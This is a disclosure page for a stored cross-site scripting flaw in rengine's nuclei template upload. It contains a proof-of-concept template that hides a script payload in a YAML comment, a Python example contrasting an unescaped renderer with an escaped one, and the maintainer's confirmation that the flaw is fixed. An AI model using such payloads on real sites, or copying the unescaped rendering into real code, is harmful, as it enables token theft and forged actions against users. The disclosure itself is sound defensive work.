Cross-site Scripting (XSS) - Stored in yogeshojha/rengine

Status: Valid

Reported on: Aug 31st 2021


✍️ Description

Hi. When creating a template for nuclei, it is possible to upload a malicious template containing an XSS payload; clicking to view this template will run the XSS.

🕵️‍♂️ Proof of Concept

1- First, create the malicious template:

id: poc-xss
#<script>alert(1)</script>
info:
  name: xss-storage-rengine
  author: phor3nsic
  severity: low

requests:
  - method: GET
    path:
        - "{{BaseURL}}/"

    matchers:
      - type: regex
        regex:
          - "\\<title\\>poc\\s"
        part: body

2- Upload this template, then click to view it!

💥 Impact

It's possible to leak users' csrftoken and bypass this protection, performing CSRF attacks against other accounts.
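The rendering defect behind this report, shown as an added example that is not rengine's own code: a "view template" page that drops the stored file body into the HTML unescaped, beside the same page with escaping applied at the output boundary (what Django's default autoescaping does for a plain {{ contents }}). The view function names, the surrounding markup and the sample template constant are assumptions; the sample body is the reporter's PoC above. It also shows why validating the uploaded file as YAML is no defence here: the payload sits in a YAML comment, which any parser discards before a structural check sees it.

```python
import html
import re
from typing import List

# Constructed sample: the reporter's PoC template, payload in a YAML comment.
POC_TEMPLATE = """id: poc-xss
#<script>alert(1)</script>
info:
  name: xss-storage-rengine
  author: phor3nsic
  severity: low
"""

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_template_view_vulnerable(contents: str) -> str:
    """Hypothetical 'view template' page: the stored body is concatenated into
    the HTML as-is, the equivalent of Django's {{ contents|safe }} or
    mark_safe(). The browser parses the <script> hidden in the YAML comment."""
    return '<pre class="template">' + contents + "</pre>"


def render_template_view_fixed(contents: str) -> str:
    """Same page with HTML escaping at the output boundary. html.escape with
    quote=True turns & < > " ' into entities, so the body is shown, not run."""
    return '<pre class="template">' + html.escape(contents, quote=True) + "</pre>"


def yaml_comment_lines(contents: str) -> List[str]:
    """Lines a YAML parser throws away as comments. Markup placed here never
    reaches a schema or structure validator, so 'is this valid YAML?' says
    nothing about whether the file is safe to render."""
    return [ln for ln in contents.splitlines() if ln.lstrip().startswith("#")]


def contains_active_script(rendered: str) -> bool:
    """Crude detector: does the rendered HTML still carry a live <script> tag?"""
    return SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    for label, render in (("vulnerable", render_template_view_vulnerable),
                          ("fixed", render_template_view_fixed)):
        page = render(POC_TEMPLATE)
        print(f"{label:10s} live <script>? {contains_active_script(page)}")
    print("hidden in YAML comments:", yaml_comment_lines(POC_TEMPLATE))
```

The check to make on the real application is therefore not "does the template parse" but "is every path that echoes the stored body back (view page, edit form, error messages) escaped or rendered inside an element that cannot execute it". On the impact side, Django's csrftoken cookie is readable from JavaScript unless CSRF_COOKIE_HTTPONLY is set (it defaults to False), and script running on the same origin can in any case read the token from a rendered form; once stored XSS fires, the CSRF check no longer protects that user.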

We have contacted a member of the yogeshojha/rengine team and are waiting to hear back (23 days ago)
Yogesh Ojha validated this vulnerability (23 days ago)
Walleson Moura has been awarded the disclosure bounty
The fix bounty is now up for grabs

Yogesh Ojha (Maintainer), 23 days ago:

This is a good finding. Though the exploitability is very unlikely. You'd have to convince a user to upload a malicious nuclei template. And since we are likely to not have CSRF, the only way you could deliver the payload is probably social engineering.

Nevertheless, a very good finding. This means you guys are hunting bugs literally everywhere lol :D Good job.

Patch is on its way

Yogesh Ojha confirmed that a fix has been merged on ab89a2 (23 days ago)
Yogesh Ojha has been awarded the fix bounty

Yogesh Ojha (Maintainer), 23 days ago:

Thank you for reporting this. I've pushed the patches. Additionally, I've also fixed XSS for Tool config input box, and GF patterns upload as well.

You may retest them and update me if you find any other instances of XSS.

Thank you again for reporting this and I very much appreciate it.

Thank you for making open source secure <3

Yogesh Ojha (Maintainer), 23 days ago:

Also, congratulations on this bounty. I look forward to many more such reports.

Walleson Moura (Researcher), 23 days ago:

Hi, Thanks for the reward, but what makes me happy is to contribute to the tool! :)